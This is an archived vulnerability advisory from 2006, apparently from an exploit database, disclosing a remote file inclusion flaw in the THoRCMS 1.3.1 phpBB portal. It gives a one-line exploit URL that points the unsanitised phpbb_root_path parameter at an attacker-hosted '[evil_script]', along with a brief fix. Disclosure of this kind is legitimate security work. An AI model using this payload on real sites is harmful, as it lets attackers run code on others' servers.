id: 546
date: 06/24/2006
title: THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability
author: Kw3[R]Ln
cves: 

====================================================================
THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability
====================================================================




--------------------------------------------------------------------------- 
THoRCMS <= 1.3.1 ([phpbb_root_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : THoRCMS
version : latest version [ 1.3.1 ]
Description: A CMS/Portal for phpBB
URL : http://www.phpbbhacks.com/download/2349

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $phpbb_root_path not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]


---------------------------------------------------------------------------

Solution :
~~~~~~~~~~

declare variabel $phpbb_root_path


-------------------------------- [ EOF] ----------------------------------



#  0day.today [2023-03-23]  #